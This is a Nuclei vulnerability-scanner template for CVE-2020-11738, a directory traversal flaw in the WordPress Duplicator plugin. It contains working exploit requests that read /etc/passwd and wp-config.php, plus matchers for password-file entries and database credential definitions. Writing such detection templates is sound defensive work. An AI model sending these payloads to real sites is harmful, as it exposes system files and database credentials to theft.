nuclei-templates/cves/2020/CVE-2020-11738.yaml

47 lines
1.7 KiB
YAML

id: CVE-2020-11738
info:
name: WordPress Duplicator plugin Directory Traversal
author: dwisiswant0
severity: high
description: |
The issue is being actively exploited, and allows attackers
to download arbitrary files, such as the wp-config.php file.
According to the vendor, the vulnerability was only in two
versions v1.3.24 and v1.3.26, the vulnerability wasn't
present in versions 1.3.22 and before.
reference:
- https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild
- https://snapcreek.com/duplicator/docs/changelog/?lite
- https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/
- http://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-11738
cwe-id: CWE-22
tags: cve,cve2020,wordpress,wp-plugin,lfi,cisa
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "File Transfer"
- "application/octet-stream"
- "attachment; filename=\"(wp-config\\.php|passwd)\""
condition: and
part: header
- type: regex
regex:
- "root:.*:0:0:"
- "define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"
condition: or
part: body